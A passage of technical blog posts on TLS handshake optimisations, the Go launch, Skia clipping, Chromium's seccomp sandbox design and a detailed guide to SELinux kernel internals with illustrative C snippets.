      Application Data             <------->     Application Data

This means that an HTTPS connection adds an extra two round trips on top of HTTP.

Nagendra Modadugu and myself (independently) came up with a “cut through” mode for TLS handshakes. Rather than wait for the server's Finished message, the client can send application data after only one round trip. This means than an attacker can perform a downgrade attack on the cipher and force the client to transmit with a weaker cipher than it might have normally used. However, an attacker cannot get the key so, as long as all the supported ciphers are strong enough, it all works out.

This cuts a round-trip time from a normal HTTPS handshake and should be appearing in Chromium and Android soon.

(Nelson Bolyard tells me that this isn't a novel idea, although it doesn't seem to have had much traction up til now.)

Next protocol negotiation

TLS over port 443 is the only clean channel that many hosts have these days. However, this means that the TCP destination port number can no longer be used to select an application level protocol since it's fixed by firewalls, proxies etc.

The specific use case for this would be SDPY, a new transport layer for HTTP. We want to know, before we send the first request, if the server supports SDPY.

draft-agl-tls-nextprotoneg describes an extension to let you do that. It's being tested in Chromium at the moment (although not yet in the public tree).

Go launch

I'm delighted to be a minor part of the Go launch today:

Go is an experimental language from Google that I've been coding in for the past month or so. It sits in a similar niche to Java: performant but garbage collected. However, it's vastly more enjoyable to code in than Java!

Thanks to a suite of compilers, it compiles to machine code very quickly. There's also a frontend to GCC in the works. It's runtime and type safe, concurrent, has a novel (for me, at least) take on object orientation and provides runtime reflections on types.

Personally, I think it gets a place in my list of favoured tools, which currently contains C, C++, Python and Haskell.

The TLS flaw that wasn't

There were many articles yesterday suggesting that a major new flaw in TLS (aka SSL) had been found ([1][2][3]). The last of those is a post by Ben Laurie, an expert in these matters, with a suitably hyperbolic title: “Another Protocol Bites The Dust”

Here's the issue: there's an extremely uncommon configuration of web servers where they're setup to require client side certificates for some URLs and not others. If a user has an HTTPS connection open that didn't handshake with a client side certificate and they try to access such a URL, the webserver will perform another handshake on the same connection. As soon as that handshake completes with the correct certificate, they'll run the request that was received from before the connection was fully authenticated.

It's a bug in the web server. There was a misunderstanding between what the folks writing the webserver thought that TLS was providing and what it actually provides. One might also argue that it's a short coming in the HTTP protocol (there's no way for a server to ask a client to redo a request). One might also argue that TLS should provide the properties that the web servers expected.

But it's not a flaw in TLS. The TLS security properties are exactly what was intended.

Now, it appears that the fix will be to TLS. That's fine, but the place that gets ‘fixed’ isn't always the place that made the mistake.

I don't understand why knowledgeable folks like EKR and Laurie are so eager to attribute this problem to TLS.

Anti aliased clipping, a tale of woe

People have been complaining that rounded rectangles in Chrome aren't anti-aliased. If you're a web developer, it seems that this is a Big Deal.

The issue is that almost anything can have rounded corners in WebKit. There's not a drawRoundedRectangle function, instead, clipping paths are created and then normal drawing proceeds. On Safari (which is also WebKit, but sitting on top of the CoreGraphics library), clipping to a path is anti-aliased and everything looks pretty. However, Chrome's graphics library, Skia, doesn't do anti-aliased clipping for a good reason.

Consider the figure below:

At the top left is an anti-aliased clipping region. The darker the pixel, the more is covered by the path. If we were to fill the region with green, we would get the image at the bottom left. When drawing, we consider how much of the clipping region covers each pixel and convert that to an alpha value. For a pixel which was half covered by the clipping region we would calculate 50% × background_color + 50% × green.

However, consider what happens when we first fill with red (top right) and then with green (bottom right). We would expect that the result would be the same as filling with green - the second fill should cover the first. But for pixels which are fractionally covered by clipping region, this isn't the case.

The first fill, with red, works correctly as detailed above. But when we come to do the second fill, the background_color isn't the original background color, but the slightly red color resulting from the first fill. Both CoreGraphics and Firefox's <canvas> have this bug.

It might seem trivial, but if you end up covering anti-aliased clipping regions multiple times you end up with unsightly borders around the clip paths. This is why Skia only supports 1-bit clip paths.

The correct way to do anti-aliased clipping is to draw to a layer, on top of the original bitmap, and, when the clipping path is popped from the clip stack, erase outside of the path (anti-aliased) and composite the result onto the underlying bitmap.

This works just fine, the problem is that <canvas> users don't always pop the clip stack. They expect to be able to set a clipping path, draw and have it appear without managing a stack. We could collapse the clipping stack for them when we paint to the screen, but then we need to restore it afterwards, which would require major surgery to Skia.

The second problem with anti-aliasing, even when done correctly, is that it makes it impossible to put polygons next to each other. Try this demo in Firefox and note the hairlines caused by anti-aliasing.

I think what Chrome will end up doing is to anti-alias the clipping paths (correctly) for everything except <canvas>. This isn't a great solution, but it's better than what we have now.

Chromium's seccomp Sandbox

I wrote an article for LWN about Chromium's seccomp sandbox. They decided that it wasn't in the right style for LWN, and they rewrote it to fit. Their version has just become available for free. I'm including my version below:

The Chromium seccomp sandbox

As part of the process of porting Chromium to Linux, we had to decide how to implement Chromium's sandbox on Linux.

The Chromium sandbox is an important part of keeping users safe. The web is a very complicated place these days and the code to parse and interpret it is large and on the front-line of security. We try to make sure that this code is free of security bugs, but history suggests that we can't be perfect. So, we plan for the case where someone has an exploit against our rendering code and run it in its own process with limited authority. It's the sandbox's job to limit that authority as much as possible.

Chromium renderers need very little authority. They need access to fontconfig to find fonts on the system and to open those font files. However, these can be handled as IPC requests to the browser process. They do not need access to the X server (which is why we don't have GTK widgets on web pages), nor should they be able to access DBus, which is increasingly powerful these days.

Drawing is handled using SysV shared memory (so that we can share memory directly with X). Everything else is either serialised over a socketpair or passed using a file descriptor to a tmpfs file. This means that we can deny filesystem access completely. The renderer requires no network access: the network stack is entirely within the browser process.

Traditional sandboxing schemes on Linux involve switching UIDs and using chroot. We'll be using some of those techniques too. But this text is about the most experimental part of our sandbox: the seccomp layer which my colleague Markus Gutschke has been writing.

The kernel provides a little known feature where by any process can enter ‘seccomp mode’. Once enabled it cannot be disabled. Any process running in seccomp mode can only make four system calls: read, write, sigreturn and exit. Attempting any other system call will result in the immediate termination of the process.

This is quite desirable for preventing attacks. It removes network access, which is traditionally difficult to limit otherwise (although CLONE_NEWNET is might help here). It also limits access to new, possibly dangerous, system calls that we don't otherwise need like tee and vmsplice. Also, because read and write proceed at full speed, if we limit our use of other system calls, we can hope to have a minimal performance overhead.

But we do need to support some other system calls. Allocating memory is certainly very useful. The traditional way to support this would be to RPC to a trusted helper process which could validate and perform the needed actions. However, a different process cannot allocate memory on our behalf. In order to affect the address space of the sandboxed code, the trusted code would have to be inside the process!

So that's what we do: each untrusted thread has a trusted helper thread running in the same process. This certainly presents a fairly hostile environment for the trusted code to run in. For one, it can only trust its CPU registers - all memory must be assumed to be hostile. Since C code will spill to the stack when needed and may pass arguments on the stack, all the code for the trusted thread has to carefully written in assembly.

The trusted thread can receive requests to make system calls from the untrusted thread over a socket pair, validate the system call number and perform them on its behalf. We can stop the untrusted thread from breaking out by only using CPU registers and by refusing to let the untrusted code manipulate the VM in unsafe ways with mmap, mprotect etc.

That could work, if only the untrusted code would make RPCs rather than system calls. Our renderer code is very large however. We couldn't patch every call site and, even if we could, our upstream libraries don't want those patches. Alternatively, we could try and intercept at dynamic linking time, assuming that all the system calls are via glibc. Even if that were true, glibc's functions make system calls directly, so we would have to patch at the level of functions like printf rather than write.

This would seem to be a very tough problem, but keep in mind that if we miss a call site, it's not a security issue: the kernel will kill us. It's just a crash bug. So we could use a theoretically incorrect solution so long as it actually worked in practice. And this is what we do:

At startup we haven't processed any untrusted input, so we assume that the program is uncompromised. Now we can disassemble our own memory, find sites where we make system calls and patch them. Correctly parsing x86 machine code is very tough. Native Client uses a customised compiler which only generates a subset of x86 in order to do it. But we don't need a perfect disassembler so long as it works in practice for the code that we have. It turns out that a simple disassembler does the job perfectly well with only a very few corner cases.

Now that we have patched all the call sites to call our RPC wrapper, instead of the kernel, we are almost done. We have only to consider system calls which pass arguments in memory. Because the untrusted code can modify any memory that the trusted code can, the trusted code couldn't validate calls like open. It could verify the filename being requested but the untrusted code could change the filename before the kernel copied the string from user-space.

For these cases, we also have a single trusted process. This trusted process shares a couple of pages of memory with each of the trusted threads. When the trusted thread is asked to make a system call which it cannot safely validate, it forwards the call to the trusted process. Since the trusted process has a different address space, it can safely validate the arguments without interference. It then copies the validated arguments into the shared memory pages. These memory pages are writable by the trusted process, but read-only in the sandboxed process. Thus the untrusted code cannot modify them and the trusted code can safely make the system call using the validated, read-only arguments.

We also use this trick for system calls like mmap which don't take arguments in memory, but are complicated to verify. Recall that the trusted thread has to be hand written in assembly so we try to minimise the amount of this code where possible.

Once we have this scheme in place we can intercept, examine and deny any system calls. We start off denying everything and then, slowly, add system calls that we need. For each system call we need to consider the security implications it might have. Calls like getpid are easy, but what damage could one do with mmap/munmap? Well, the untrusted code could replace the code which the trusted threads are running for one! So, when a call might be dangerous we allow only a minimal, and carefully examimed, subset of flags which match the uses that we actually have in our code.

We'll be layering this sandbox with some more traditional UNIX sandboxing techniques in the final design. However, you can get a preview of the code in it's incomplete state already at its Google Code homepage.

There's still much work to be done. A given renderer could load a web page with an iframe to any domain. Those iframes are handled in the same renderer, thus a compromised renderer can ask the browser for any of the user's cookies. Microsoft research developed Gazelle, which has much stricter controls on a renderer, at the expense of web-compatibility. We know that users wont accept browsers that don't work with their favourite websites, but we are also very jealous of Gazelle's security properties so hopefully we can improve Chromium along those lines in the future.

Another weak spot are installed plugins. Plugin support on Linux is very new but on Windows, at least, we don't sandbox plugins. They don't expect to be sandboxed and we hurt web-compatibility (and break their auto-updating) if we limit them. That means that plugins are a vector for more serious attacks against web browsers. As ever, keep up to date with the latest security patches!

DNSCurve Internet Draft

Matthew has posted a Internet draft for DNSCurve. DNSCurve is a way of securing DNS which isn't DNSSEC. See Dan's talk from a couple of weeks ago about why DNSCurve is the better answer.

DEFCON 17

I'll be going to DEFCON this year. Ping me if you'll be around.

SELinux from the inside out

There are some great sources of information for users and sysadmins about SELinux [1] [2] but your author has always preferred to understand a system from the bottom-up and, in this regard, found the information somewhat lacking. This document is a guide to the internals of SELinux by starting at the kernel source and working outwards.

We'll be drawing on three different sources in order to write this document.

Access vectors

SELinux is fundamentally about answering questions of the form “May x do y to z?” and enforcing the result. Although the nature of the subject and object can be complex, they all boil down to security identifiers (SIDs), which are unsigned 32-bit integers.

The action boils down to a class and a permission. Each class can have up to 32 permissions (because they are stored as a bitmask in a 32-bit int). Examples of classes are FILE, TCP_SOCKET and X_EVENT. For the FILE class, some examples of permissions are READ, WRITE, LOCK etc.

At the time of writing there are 73 different classes (selinux/libselinux/include/selinux/flask.h) and 1025 different permissions (.../av_permissions.h).

The security policy of a system can be thought of as a table, with subjects running down the left edge, objects across the top and, in each cell, the set of actions which that subject can perform on that object.

This is reflected in the first part of the SELinux code that we'll look at : the access vector cache (security/selinux/avc.c). The AVC is a hash map from (subject, object, class) to the bitset of permissions allowed:

struct avc_entry {
        u32                     ssid;    // subject SID
        u32                     tsid;    // object SID
        u16                     tclass;  // class
        struct av_decision      avd;     // contains the set of permissions for that class
};

The AVC is queried when the kernel needs to make security decisions. SELinux hooks into the kernel using the LSM hooks and is called whenever the kernel is about to perform an action which needs a security check. Consider the getpgid system call to get the current process group ID. When SELinux is built into a kernel, this ends up calling the following hook function (security/selinux/hooks.c):

static int selinux_task_getpgid(struct task_struct *p)
{
        return current_has_perm(p, PROCESS__GETPGID);
}

static int current_has_perm(const struct task_struct *tsk,
                            u32 perms)
{
        u32 sid, tsid;

        sid = current_sid();
        tsid = task_sid(tsk);
        return avc_has_perm(sid, tsid, SECCLASS_PROCESS, perms, NULL);
}

Referring back to the table concept: in order to check if a process with SID x may call getpgid we find x across and x down and check that SECCLASS_PROCESS:PROCESS__GETPID is in the set of allowed actions.

So now we have to discover what the AVC is actually caching, and where these SIDs are coming from. We'll tackle the latter question first.

SIDs and Security Contexts

SIDs turn out to be much like interned symbols in some languages. Rather than keeping track of complex objects and spending time comparing them during lookups, they are reduced to an identifier via a table. SIDs are the interned identifiers of security contexts. The sidtab maps from one to the other (security/selinux/ss/sidtab.h):

struct sidtab {
        struct sidtab_node **htable;
        unsigned int nel;       /* number of elements */
        unsigned int next_sid;  /* next SID to allocate */
        unsigned char shutdown;
        spinlock_t lock;
};

struct sidtab_node {
        u32 sid;                       /* security identifier */
        struct context context;        /* security context structure */
        struct sidtab_node *next;
};

The SID table is optimised for mapping from SIDs to security contexts. Mapping the other way involves walking the whole hash table.

The structure for the security context is probably familiar to you if you have worked with SELinux before (security/selinux/ss/context.h):

struct context {
        u32 user;
        u32 role;
        u32 type;
        u32 len;        /* length of string in bytes */
        struct mls_range range;
        char *str;        /* string representation if context cannot be mapped. */
};

If you have an SELinux enabled system, you can look at your current security context with id -Z. Running that will produce something like unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023. This string splits into four parts:

  1. The SELinux “user”: unconfined_u
  2. The role: unconfined_r
  3. The type: unconfined_t (we'll mostly be concentrating on types)
  4. The multi-level-security (MLS) sensitivity and compartments: s0-s0:c0.c1023

(You might notice that the parts are broken up with colons, but that the MLS part can contain colons too! Obviously, this is the only part that can contain colons to avoid ambiguity.)

When the system's security policy is compiled, these names are mapped to IDs. It's these IDs which end up in the kernel's context structure. Also notice that, by convention, types end in _t, roles with _r and users with _u. Don't confuse UNIX users with SELinux users; they are separate namespaces. For a sense of scale, on a Fedora 11 box, the default policy includes 8 users, 11 roles and 2727 types.

The Security Server

We now address the question of what it is that the access vector cache is actually caching. When a question is asked of the AVC to which it doesn't have an answer, it falls back on the security server. The security server is responsible for interpreting the policy from userspace. The code lives in context_struct_compute_av (in security/selinux/ss/services.c). We'll walk through its logic (and we'll expand on each of these points below):

  1. The subject and object's type are used to index type_attr_map, which results in a set of types for each of them.
  2. We consider the Cartesian product of the two sets and build up a 32-bit allowed bit-vector based on the union of the permissions in the access vector table for each (subject, object) pair.
  3. For each pair in the product, we also include the union of permissions from a second access vector table: the conditional access vector table.
  4. The target type is used to index an array and from that we get a linked list of “constraints”. Each constraint contains byte code for a stack based virtual machine and can limit the granted permissions.
  5. If the resulting set of permissions includes role transition, then we walk a linked list of allowed role transitions. If the transition isn't whitelisted, those permissions are removed.
  6. If either the subject or object's type is ‘bounded’, then we recurse and check the permissions of the bounded types. We verify that the resulting permissions are a subset of the permissions enjoyed by types that they are bounded by. This should be statically enforced by the tool with produced the policy so, if we find a violation, it's logged and the resulting permissions are clipped.

Now, dealing with each of those steps in more detail:

Type attributes

Type attributes are discussed in the Configuring the SELinux Policy report. They are used for grouping types together: by including a type attribute on a new type, the new type inherits all the permissions granted to the type attribute. As can be seen from the description above, type attributes are implemented as types themselves.

These attributes could have been statically expanded by the tool which generated the policy file. Expanding at generation time is a time/space tradeoff and the SELinux developers opted for the smaller policy file.

It's also worth noting that type_attr_map isn't expanded recursively: one can only have one level of type attributes.

Type attributes conventionally end in _type (as opposed to types, which end in _t). In the Fedora 11 policy, here are the top five type attributes:

Name of type attribute Number of types with that attribute
file_type 1406
non_security_file_type 1401
exec_type 484
entry_type 478
domain 442

The graph of types and type attributes is, as expected, bipartite.

The conditional access vector table

The conditional access vector table contains permissions just like the regular access vector table except that each, optionally, has an extra flag: AV_ENABLED (security/selinux/avtab.h). This flag can be enabled and disabled at run time by changing the value of ‘booleans’. These booleans are quite well covered by the higher-level documentation for the policy language (here and here).

The set of booleans can be found in /selinux/booleans (if you are running SELinux). They can be read without special authority although you should be aware of a bug: trying to read more than a page from one of those files results in -EINVAL and recent coreutils binaries (like cat) use a buffer size of 32K. Instead you can use dd, or just run the friendly tool: semanage boolean -l.

The AV_ENABLED flag is updated when a boolean is changed. The conditional access vector table is populated by a list of cond_node structures (security/selinux/conditional.h). These contain a bytecode for a limited, stack based machine and and two lists of access vectors which should be enabled or disabled in the case that the machine returns true or false.

The stack machine can read any of the configured booleans and combine them with standard boolean algebra, returning a single bit result.

Constraints

One of the parts of the SELinux policy language is the ability to define constraints. Constraints are defined using the neverallow command. Constraints are used to prevent people from writing bad policy, or in the case of MLS, to enforce rules governing information flow. http://danwalsh.livejournal.com/12333.html

As you can see if you read the above linked blog post, constraints are statically enforced by the policy tools where possible and also checked by the kernel. Constraints are evaluated by running a stack-machine bytecode. (This is a different machine than that which is used for the conditional access vector table.) Based on the kernel code for the stack-machine, we can write a simple disassembler and see what constraints are enforced in the kernel.

In the Fedora 11 policy, 32 classes have constraints applied to them. Let's have a look at some of them. Here's the first one:

constraint for class 'process' permissions:800000:
  DYNTRANSITION
subject.user == object.user?
subject.role == object.role?
and

Roughly translated, this means “Whenever operating on an object of class process, the DYNTRANSITION permission is forbidden unless the user and role of the subject and object match”. A DYNTRANSITION (dynamic transition) is when a process switches security contexts without execing a binary. Think of it like a setuid call for security contexts (we'll cover how to perform this later).

Here's another constraint, a longer one this time:

constraint for class 'file' permissions:188:
  CREATE
  RELABELFROM
  RELABELTO
subject.user == object.user?
[bootloader_t, devicekit_power_t, logrotate_t, ldconfig_t, unconfined_cronjob_t, unconfined_sendmail_t, setfiles_mac_t,
initrc_t, sysadm_t, ada_t, fsadm_t, kudzu_t, lvm_t, mdadm_t, mono_t, rpm_t, wine_t, xdm_t, unconfined_mount_t,
oddjob_mkhomedir_t, saslauthd_t, krb5kdc_t, newrole_t, prelink_t, anaconda_t, local_login_t, rpm_script_t,
sysadm_passwd_t, system_cronjob_t, tmpreaper_t, samba_unconfined_net_t, unconfined_notrans_t, unconfined_execmem_t,
devicekit_disk_t, firstboot_t, samba_unconfined_script_t, unconfined_java_t, unconfined_mono_t,
httpd_unconfined_script_t, groupadd_t, depmod_t, insmod_t, kernel_t, kpropd_t, livecd_t, oddjob_t, passwd_t, apmd_t,
chfn_t, clvmd_t, crond_t, ftpd_t, inetd_t, init_t, rshd_t, sshd_t, staff_t, udev_t, virtd_t, xend_t, devicekit_t,
remote_login_t, inetd_child_t, qemu_unconfined_t, restorecond_t, setfiles_t, unconfined_t, kadmind_t,
ricci_modcluster_t, rlogind_t, sulogin_t, yppasswdd_t, telnetd_t, useradd_t, xserver_t] contains subject.type?
or

This means that when you create a file or change its security context, either the SELinux user of the file has to match your current SELinux user, or you have to be one of a list of privileged types.

One last example foreshadows several large subjects: user-land object managers and multi-level security. For now I'll leave it undiscussed to wet your appetite.

constraint for class 'db_database' permissions:7de:
  DROP
  GETATTR
  SETATTR
  RELABELFROM
  ACCESS
  INSTALL_MODULE
  LOAD_MODULE
  GET_PARAM
  SET_PARAM
object.sensitivity[high] dominates type?

Roles and users

In step 5, above, we mention ‘role transitions’, so we should probably discuss SELinux users and roles. Keep in mind that SELinux users are separate from normal UNIX users.

Each type inhabits some set of roles and each role inhabits some set of SELinux users. UNIX users are mapped to SELinux users at login time (run `semanage login -l`) and so each user has some set of roles that they may operate under. Like the standard custom of administrating a system by logging in as a normal user and using sudo only for the tasks which need root privilege, roles are designed for the same purpose. Although a given physical user may need to perform administrative tasks, they probably don't want to have that power all the time. If they did, then there would be a confused deputy problem when they perform what should be an unprivileged task which does far more than intended because they performed it with excess authority.

Here's the graph of users and roles in the Fedora 11 targeted policy:

An SELinux user can move between roles with the newrole command, if such a role transition is permitted. Here's the graph of permitted role transitions in the Fedora policy:

With the targeted policy at least, roles and users play a relatively small part in SELinux and we won't cover them again.

Bounded types

A type in SELinux may be “bounded” to another type. This means that the bounded type's permissions are a strict subset of the parent and here we find the beginnings of a type hierarchy. The code for enforcing this originally existed only in the user-space tools which build the policy, but recently it was directly integrated into the kernel.

In the future, this will make it possible for a lesser privileged process to safely carve out subsets of policy underneath the administratively-defined policy. At the time of writing, this functionality has yet to be integrated in any shipping distribution.

(Thanks to Stephen Smalley for clearing up this section.)

The SELinux filesystem

The kernel mostly communicates with userspace via filesystems. There's both the SELinux filesystem (usually mounted at /selinux) and the standard proc filesystem. Here we'll run down some of the various SELinux specific entries in each.

But first, a quick note. Several of the entries are described as ‘transaction’ files. This means that you must open them, perform a single write and then a single read to get the result. You must use the same file descriptor for both (so, no echo, cat pairs in shell scripts).

/selinux/enforcing

A boolean file which specifies if the system is in ‘enforcing’ mode. If so, SELinux permissions checks are enforced. Otherwise, they only cause audit messages.

(Read: unprivileged. Write: requires root, SECURITY:SETENFORCE and that the kernel be built with CONFIG_SECURITY_SELINUX_DEVELOP.)

/selinux/disable

A write only, boolean file which causes SELinux to be disabled. The LSM looks are reset, the SELinux filesystem is unregistered etc. SELinux can only be disabled once and probably doesn't leave your kernel in the best of states.

(Read: unsupported. Write: requires root, and that the kernel be built with CONFIG_SECURITY_SELINUX_DISABLE.)

/selinux/policyvers

A read only file which contains the version of the current policy. The version of a policy is contained in the binary policy file and the kernel contains logic to deal with older policy versions, should the version number in the file suggest that it's needed.

(Read: unprivileged. Write: unsupported.)

/selinux/load

A write only file which is used to load policies into the kernel. Loading a new policy triggers a global AVC invalidation.

(Read: unsupported. Write: requires root and SECURITY:LOAD_POLICY.)

/selinux/context

A transaction file. One writes a security context string and then reads the resulting, canonicalised context. The context is canonicalised by running it via the sidtab.

(Read/Write: unprivileged.)

/selinux/checkreqprot

A boolean file which determines which permissions are checked for mmap and mprotect calls. In certain cases the kernel can actually grant a process more access than it requests with these calls. (For example, if a shared library is marked as needing an executable stack, then the kernel may add the PROT_EXEC permission if the process didn't request it.)

If the value of this boolean is one, then SELinux checks the permissions requested by the process. If 0, it checks the permissions which the process will actually receive.

(Read: unprivileged. Write: requires root, and SECURITY:SETCHECKREQPROT.)

/selinux/access

A transaction file which allows a user-space process to query the access vector table. This is the basis of user-space object managers.

The write phase consists of a string of the following form: ${subject security context (string)} ${object security context (string)} ${class (uint16_t, base 10)} ${requested permissions (uint32_t bitmap, base 16)}.

The read phase results in a string with this format: ${allowed permissions (uint32_t bitmap, base 16)} 0xffffffff ${audit allow (uint32_t bitmap, base 16)} ${audit deny (uint32_t bitmap, base 16)} ${sequence number (uint32_t, base 10)} ${flags (uint32_t, base 16)}.

This call will be covered in greater detail in the User-space Object Managers section, below.

(Read/Write: SECURITY:COMPUTE_AV.)

Attribute files

SELinux is also responsible for a number of attribute files in /proc. The attribute system is actually a generic LSM hook, although the names of the nodes are current hardcoded into the code for the proc filesystem.

/proc/pid/attr/current

Contains the current security context for the process. Writing to this performs a dynamic transition to the new context. In order to do this:

  • The current security context must have PROCESS:DYNTRANSITION to the new context.
  • The process must be single threaded or the transition must be to a context bounded by the current context.
  • If the process is being traced, the tracer must have permissions to trace the new context.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETCURRENT)

/proc/pid/attr/exec

Sets the security context for child processes. The permissions checking is done at exec time rather than when writing this file.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETEXEC)

/proc/pid/attr/fscreate

Sets the security context for files created by the current process. The permissions checking is done at creat/open time rather than when writing this file.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETFSCREATE)

/proc/pid/attr/keycreate

Sets the security context for keys created by the current process. Keys support in the kernel is documented in Documentation/keys.txt. The permissions checking is done at creation time rather than when writing this file.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETKEYCREATE)

/proc/pid/attr/sockcreate

Sets the security context for sockets created by the current process. The permissions checking is done at creation time rather than when writing this file.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETSOCKCREATE)

User-space object managers

Although the kernel is a large source of authority for many process, it's certainly not the only one these days. An increasing amount of ambient authority is being granted via new services like DBus and then there's always the venerable old X server which, by default, allows clients to screenshot other windows, grab the keyboard input etc.

The most common example of a user-space process attempting to enforce a security policy is probably a SQL servers. PostgreSQL and MySQL both have a login system and an internal user namespace, permissions database etc. This leads to administrators having to learn a whole separate security system, use password authentication over local sockets, include passwords embedded in CGI scripts etc.

User-space object managers are designed to solve this issue by allowing a single policy to express the allowed actions for objects which are managed outside the kernel. The NSA has published a number of papers about securing these types of systems: X: [1] [2], DBus: [1]. See also the SE-PostgreSQL project for details on PostgreSQL and Apache.

In order to implement such a design a user-space process needs to be able to label its objects, query the global policy and determine the security context of requests from clients. The libselinux library contains the canonical functions for doing all these things, but this document is about what lies under the hood, so we'll be doing it raw here.

The task of labeling objects is quite specific to each different object manager and this problem is discussed in the above referenced papers. Labels need to be stored (probably persistently) and administrators need some way to query and manipulate them. For example, in the X server, objects are often labeled with a type which derives from its name ("XInput" → "input_ext_t")

When it comes to querying the policy database, a process could either open the policy file from disk (which we'll cover later) or it could query the kernel. Querying the kernel solves a number of issues around locating the policy and invalidating caches when it gets reloaded, so that's the path which the SELinux folks have taken. See the section on /selinux/access for the interface for doing this.

In order to authenticate requests from clients, SELinux allows a process to get the security context of the other end of a local socket. There are efforts underway to extend this beyond the scope of a single computer, but I'm going to omit the details for brevity here.

I'll start with a code example of this authentication first:

  const int afd = socket(PF_UNIX, SOCK_STREAM, 0);
  assert(afd >= 0);

  struct sockaddr_un sun;
  memset(&sun, 0, sizeof(sun));
  sun.sun_family = AF_UNIX;
  strcpy(sun.sun_path, "test-socket");
  assert(bind(afd, (struct sockaddr*) &sun, sizeof(sun)) == 0);
  assert(listen(afd, 1) == 0);
  const int fd = accept(afd, NULL, NULL);
  assert(fd >= 0);

  char buf[256];
  socklen_t bufsize = sizeof(buf);
  assert(getsockopt(fd, SOL_SOCKET, SO_PEERSEC, buf, &bufsize) == 0);
  printf("%s\n", buf);

This code snippet will print the security context of any process which connects to it. Running it without any special configuration on a Fedora 11 system (targeted policy) will result in a context of unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023. Don't try running it on a socket pair however, you end up with system_u:object_r:unlabeled_t:s0.

If you already have code which is using SCM_CREDENTIALS to authenticate peers, you can use getpidcon to get a security context from a PID. Under the hood this just reads /proc/pid/attr/context.

Now that we can label requests, the next part of the puzzle is getting access decisions from the kernel. As hinted at above, the /selinux/access file allows this. See above for the details of the transaction format. As an example, we'll see if the action PROCESS:GETATTR, with a subject and object of unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023, is permitted.

  → unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 2 00010000
  ← f77fffff ffffffff 0 fffafb7f 11

This is telling us that it is permitted (the only bits missing are for EXECHEAP and DYNTRANSITION). It also tells us the permissions which should be logged on allow and deny and the sequence number of the policy state in the kernel. Note that, above, we documented an additional flags field, however it's missing in this example. That's another good reason to use libselinux! The flags field was only recently added and isn't in the kernel which I'm using for these examples.

At this time, the astute reader will be worried about the performance impact of getting this information from the kernel in such a manner. The solution is to use the same access vector cache code that the kernel uses, in user-space to cache the answers from the kernel. This is another benefit which libselinux brings.

However, every cache brings with it problems of consistency and this is no different. All user-space object managers need to know when the administrator updates the system security policy so that they can flush their AVCs. This notification is achieved via a netlink socket, as demonstrated by the following snippet:

  const int fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_SELINUX);
  assert(fd >= 0);

  struct sockaddr_nl addr;
  int len = sizeof(addr);
  memset(&addr, 0, len);
  addr.nl_family = AF_NETLINK;
  addr.nl_groups = SELNL_GRP_AVC;
  assert(bind(fd, (struct sockaddr*) &ddr, len) == 0);

  struct sockaddr_nl nladdr;
  socklen_t nladdrlen;
  char buf[1024];
  struct nlmsghdr *nlh = (struct nlmsghdr *)buf;

  for (;;) {
    nladdrlen = sizeof(nladdr);
    const ssize_t r = recvfrom(fd, buf, sizeof(buf), 0,
                               (struct sockaddr*) &nladdr, &nladdrlen);
    assert(r >= 0);
    assert(nladdrlen == sizeof(nladdr));
    assert(nladdr.nl_pid == 0);
    assert((nlh->nlmsg_flags & MSG_TRUNC) == 0);
    assert(nlh->nlmsg_len <= r);

    if (nlh->nlmsg_type == SELNL_MSG_SETENFORCE) {
      struct selnl_msg_setenforce *msg = NLMSG_DATA(nlh);
      printf("enforcing %s\n", msg->val ? "on" : "off");
    } else if (nlh->nlmsg_type == SELNL_MSG_POLICYLOAD) {
      struct selnl_msg_policyload *msg = NLMSG_DATA(nlh);
      printf("policy loaded, seqno:%d\n", msg->seqno);
    }
  }

If you toggle the enforcing mode off and on, or reload the system policy (with `semodule -R`), a message is delivered to via the netlink socket. A user-space object manager can then flush its AVC etc.

With all the above, hopefully it's now clear how user-space object managers work. If you wish to write your own, remember to read the libselinux man pages first.

Reading binary policy files

The system security policy is written in a text-based language which has been well documented elsewhere. These text files are compiled and checked by user-space tools and converted into a binary blob that can be loaded into the kernel. The binary blob is also saved on disk and can be a useful source for information.

The SELinux user-space tools contain libsepol which is very useful for parsing these files. Here's a snippet of example code which returns the number of users, roles and types defined in a policy file:

#include <sepol/policydb.h>
#include <sepol/policydb/policydb.h>

int main(int argc, char **argv) {
  FILE* file = fopen(argv[1], "r");
  sepol_policy_file_t* input;
  sepol_policy_file_create(&input);
  sepol_policy_file_set_fp(input, file);

  sepol_policydb_t* policy;
  sepol_policydb_create(&policy);
  sepol_policydb_read(policy, input);

  printf("users:%d roles:%d types:%d\n",
         policy->p.p_users.nprim
         policy->p.p_roles.nprim
         policy->p.p_types.nprim);

  return 0;
};

By looking in the sepol/policydb/policydb.h header, you can probably find whatever you are looking for. Pay special heed to the comments about indexing however. Users, roles and types are indexed from 1 in some places and from 0 in others.

With a little C code, much of the useful information can be extracted from the policy files. The numbers and graphs above were generated this way, with a little help from a few Python scripts.

Conclusion

Hopefully we've covered some useful areas of SELinux that some people were unfamiliar with before, or at least shown the inner workings of something which you already knew about.

If you want information about the practical aspects of administering a system with SELinux, you should start with the Fedora documentation on the subject. After reading this document I hope that some of it is clearer now.

General homomorphic encryption

If you've heard of Hal Finney, the following quote should be enough to get you to read: his explanation of the recent homomorphic encryption paper:

This is IMO one of the most remarkable crypto papers ever. Not only does it solve one of the oldest open problems in cryptography, the construction of a fully homomorphic encryption system, it does so by means of a self-embedding technique reminiscent of Godel's theorem.

Linux sandboxing with LSMSB

Chrome Linux got a dev channel release and I'm very happy with it. It's now my primary browser.

However, one of the big selling points for Chrome on Windows is that the renderers (which deal with decoding the HTML, CSS, image files etc) are sandboxed. We've had exploitable issues in the renderers which which have been stopped by the sandbox. It's a Good Thing.

However, we don't have a sandbox on Linux! The Mac team have been talking about how nice their sandbox is (and I expect we'll get some official documentation about it after WWDC this week). We have to hack around with SUID binaries, chrooting, seccomp and one-size-fits all SELinux solutions.

